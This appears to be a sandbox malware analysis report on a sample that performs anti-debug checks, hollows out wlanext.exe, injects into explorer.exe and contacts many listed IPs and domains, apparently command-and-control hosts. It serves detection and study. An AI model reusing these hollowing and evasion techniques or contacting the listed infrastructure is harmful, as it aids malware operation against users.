Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036CD380 mov ecx, dword ptr fs:[00000030h]	7_2_036CD380
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03621B8F mov eax, dword ptr fs:[00000030h]	7_2_03621B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03621B8F mov eax, dword ptr fs:[00000030h]	7_2_03621B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03642397 mov eax, dword ptr fs:[00000030h]	7_2_03642397
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364B390 mov eax, dword ptr fs:[00000030h]	7_2_0364B390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036CB260 mov eax, dword ptr fs:[00000030h]	7_2_036CB260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036CB260 mov eax, dword ptr fs:[00000030h]	7_2_036CB260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E8A62 mov eax, dword ptr fs:[00000030h]	7_2_036E8A62
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0365927A mov eax, dword ptr fs:[00000030h]	7_2_0365927A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]	7_2_03619240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]	7_2_03619240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]	7_2_03619240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619240 mov eax, dword ptr fs:[00000030h]	7_2_03619240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DEA55 mov eax, dword ptr fs:[00000030h]	7_2_036DEA55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036A4257 mov eax, dword ptr fs:[00000030h]	7_2_036A4257
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03654A2C mov eax, dword ptr fs:[00000030h]	7_2_03654A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03654A2C mov eax, dword ptr fs:[00000030h]	7_2_03654A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03628A0A mov eax, dword ptr fs:[00000030h]	7_2_03628A0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]	7_2_03615210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03615210 mov ecx, dword ptr fs:[00000030h]	7_2_03615210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]	7_2_03615210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03615210 mov eax, dword ptr fs:[00000030h]	7_2_03615210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361AA16 mov eax, dword ptr fs:[00000030h]	7_2_0361AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361AA16 mov eax, dword ptr fs:[00000030h]	7_2_0361AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DAA16 mov eax, dword ptr fs:[00000030h]	7_2_036DAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DAA16 mov eax, dword ptr fs:[00000030h]	7_2_036DAA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03633A1C mov eax, dword ptr fs:[00000030h]	7_2_03633A1C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03642AE4 mov eax, dword ptr fs:[00000030h]	7_2_03642AE4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03642ACB mov eax, dword ptr fs:[00000030h]	7_2_03642ACB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]	7_2_036152A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]	7_2_036152A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]	7_2_036152A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]	7_2_036152A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036152A5 mov eax, dword ptr fs:[00000030h]	7_2_036152A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0362AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0362AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364FAB0 mov eax, dword ptr fs:[00000030h]	7_2_0364FAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364D294 mov eax, dword ptr fs:[00000030h]	7_2_0364D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364D294 mov eax, dword ptr fs:[00000030h]	7_2_0364D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361C962 mov eax, dword ptr fs:[00000030h]	7_2_0361C962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361B171 mov eax, dword ptr fs:[00000030h]	7_2_0361B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361B171 mov eax, dword ptr fs:[00000030h]	7_2_0361B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363B944 mov eax, dword ptr fs:[00000030h]	7_2_0363B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363B944 mov eax, dword ptr fs:[00000030h]	7_2_0363B944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120 mov eax, dword ptr fs:[00000030h]	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03634120 mov ecx, dword ptr fs:[00000030h]	7_2_03634120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364513A mov eax, dword ptr fs:[00000030h]	7_2_0364513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364513A mov eax, dword ptr fs:[00000030h]	7_2_0364513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]	7_2_03619100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]	7_2_03619100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619100 mov eax, dword ptr fs:[00000030h]	7_2_03619100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0361B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0361B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361B1E1 mov eax, dword ptr fs:[00000030h]	7_2_0361B1E1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036A41E8 mov eax, dword ptr fs:[00000030h]	7_2_036A41E8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036461A0 mov eax, dword ptr fs:[00000030h]	7_2_036461A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036461A0 mov eax, dword ptr fs:[00000030h]	7_2_036461A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036969A6 mov eax, dword ptr fs:[00000030h]	7_2_036969A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]	7_2_036951BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]	7_2_036951BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]	7_2_036951BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036951BE mov eax, dword ptr fs:[00000030h]	7_2_036951BE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363C182 mov eax, dword ptr fs:[00000030h]	7_2_0363C182
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364A185 mov eax, dword ptr fs:[00000030h]	7_2_0364A185
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03642990 mov eax, dword ptr fs:[00000030h]	7_2_03642990
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E1074 mov eax, dword ptr fs:[00000030h]	7_2_036E1074
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036D2073 mov eax, dword ptr fs:[00000030h]	7_2_036D2073
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03630050 mov eax, dword ptr fs:[00000030h]	7_2_03630050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03630050 mov eax, dword ptr fs:[00000030h]	7_2_03630050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]	7_2_0362B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]	7_2_0362B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]	7_2_0362B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362B02A mov eax, dword ptr fs:[00000030h]	7_2_0362B02A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]	7_2_0364002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]	7_2_0364002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]	7_2_0364002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]	7_2_0364002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364002D mov eax, dword ptr fs:[00000030h]	7_2_0364002D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E4015 mov eax, dword ptr fs:[00000030h]	7_2_036E4015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E4015 mov eax, dword ptr fs:[00000030h]	7_2_036E4015
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]	7_2_03697016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]	7_2_03697016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697016 mov eax, dword ptr fs:[00000030h]	7_2_03697016
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036158EC mov eax, dword ptr fs:[00000030h]	7_2_036158EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov ecx, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AB8D0 mov eax, dword ptr fs:[00000030h]	7_2_036AB8D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036420A0 mov eax, dword ptr fs:[00000030h]	7_2_036420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036590AF mov eax, dword ptr fs:[00000030h]	7_2_036590AF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364F0BF mov ecx, dword ptr fs:[00000030h]	7_2_0364F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364F0BF mov eax, dword ptr fs:[00000030h]	7_2_0364F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364F0BF mov eax, dword ptr fs:[00000030h]	7_2_0364F0BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03619080 mov eax, dword ptr fs:[00000030h]	7_2_03619080
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03693884 mov eax, dword ptr fs:[00000030h]	7_2_03693884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03693884 mov eax, dword ptr fs:[00000030h]	7_2_03693884
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362FF60 mov eax, dword ptr fs:[00000030h]	7_2_0362FF60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E8F6A mov eax, dword ptr fs:[00000030h]	7_2_036E8F6A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362EF40 mov eax, dword ptr fs:[00000030h]	7_2_0362EF40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03614F2E mov eax, dword ptr fs:[00000030h]	7_2_03614F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03614F2E mov eax, dword ptr fs:[00000030h]	7_2_03614F2E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364E730 mov eax, dword ptr fs:[00000030h]	7_2_0364E730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E070D mov eax, dword ptr fs:[00000030h]	7_2_036E070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E070D mov eax, dword ptr fs:[00000030h]	7_2_036E070D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364A70E mov eax, dword ptr fs:[00000030h]	7_2_0364A70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364A70E mov eax, dword ptr fs:[00000030h]	7_2_0364A70E
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363F716 mov eax, dword ptr fs:[00000030h]	7_2_0363F716
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AFF10 mov eax, dword ptr fs:[00000030h]	7_2_036AFF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AFF10 mov eax, dword ptr fs:[00000030h]	7_2_036AFF10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036537F5 mov eax, dword ptr fs:[00000030h]	7_2_036537F5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03628794 mov eax, dword ptr fs:[00000030h]	7_2_03628794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]	7_2_03697794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]	7_2_03697794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03697794 mov eax, dword ptr fs:[00000030h]	7_2_03697794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362766D mov eax, dword ptr fs:[00000030h]	7_2_0362766D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]	7_2_0363AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]	7_2_0363AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]	7_2_0363AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]	7_2_0363AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363AE73 mov eax, dword ptr fs:[00000030h]	7_2_0363AE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03627E41 mov eax, dword ptr fs:[00000030h]	7_2_03627E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DAE44 mov eax, dword ptr fs:[00000030h]	7_2_036DAE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DAE44 mov eax, dword ptr fs:[00000030h]	7_2_036DAE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361E620 mov eax, dword ptr fs:[00000030h]	7_2_0361E620
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036CFE3F mov eax, dword ptr fs:[00000030h]	7_2_036CFE3F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]	7_2_0361C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]	7_2_0361C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361C600 mov eax, dword ptr fs:[00000030h]	7_2_0361C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03648E00 mov eax, dword ptr fs:[00000030h]	7_2_03648E00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036D1608 mov eax, dword ptr fs:[00000030h]	7_2_036D1608
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364A61C mov eax, dword ptr fs:[00000030h]	7_2_0364A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0364A61C mov eax, dword ptr fs:[00000030h]	7_2_0364A61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036276E2 mov eax, dword ptr fs:[00000030h]	7_2_036276E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036416E0 mov ecx, dword ptr fs:[00000030h]	7_2_036416E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03658EC7 mov eax, dword ptr fs:[00000030h]	7_2_03658EC7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036436CC mov eax, dword ptr fs:[00000030h]	7_2_036436CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036CFEC0 mov eax, dword ptr fs:[00000030h]	7_2_036CFEC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E8ED6 mov eax, dword ptr fs:[00000030h]	7_2_036E8ED6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	7_2_036E0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	7_2_036E0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E0EA5 mov eax, dword ptr fs:[00000030h]	7_2_036E0EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036946A7 mov eax, dword ptr fs:[00000030h]	7_2_036946A7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036AFE87 mov eax, dword ptr fs:[00000030h]	7_2_036AFE87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363C577 mov eax, dword ptr fs:[00000030h]	7_2_0363C577
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363C577 mov eax, dword ptr fs:[00000030h]	7_2_0363C577
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03653D43 mov eax, dword ptr fs:[00000030h]	7_2_03653D43
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03693540 mov eax, dword ptr fs:[00000030h]	7_2_03693540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03637D50 mov eax, dword ptr fs:[00000030h]	7_2_03637D50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361AD30 mov eax, dword ptr fs:[00000030h]	7_2_0361AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DE539 mov eax, dword ptr fs:[00000030h]	7_2_036DE539
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03623D34 mov eax, dword ptr fs:[00000030h]	7_2_03623D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E8D34 mov eax, dword ptr fs:[00000030h]	7_2_036E8D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0369A537 mov eax, dword ptr fs:[00000030h]	7_2_0369A537
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]	7_2_03644D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]	7_2_03644D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644D3B mov eax, dword ptr fs:[00000030h]	7_2_03644D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0362D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0362D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0362D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	7_2_036DFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	7_2_036DFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	7_2_036DFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036DFDE2 mov eax, dword ptr fs:[00000030h]	7_2_036DFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036C8DF1 mov eax, dword ptr fs:[00000030h]	7_2_036C8DF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]	7_2_03696DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]	7_2_03696DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]	7_2_03696DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov ecx, dword ptr fs:[00000030h]	7_2_03696DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]	7_2_03696DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03696DC9 mov eax, dword ptr fs:[00000030h]	7_2_03696DC9

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Code function: 3_2_00409B50 LdrLoadDll,

3_2_00409B50

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 147.255.129.44 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.143.147.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.203.115 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 43.132.183.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fulvousemollientplanet.com
Source: C:\Windows\explorer.exe	Domain query: www.rip-online.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 87.236.16.208 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.scion-go-getter.com
Source: C:\Windows\explorer.exe	Domain query: www.sandman.network
Source: C:\Windows\explorer.exe	Domain query: www.foxandmew.com
Source: C:\Windows\explorer.exe	Domain query: www.royallecleaning.com
Source: C:\Windows\explorer.exe	Domain query: www.websitessample.com
Source: C:\Windows\explorer.exe	Domain query: www.experimentwithoutlimits.com
Source: C:\Windows\explorer.exe	Domain query: www.21yingyang.com
Source: C:\Windows\explorer.exe	Domain query: www.9linefarms.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.150.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tikomobile.store
Source: C:\Windows\explorer.exe	Domain query: www.texascountrycharts.com
Source: C:\Windows\explorer.exe	Network Connect: 107.164.242.49 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 910000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

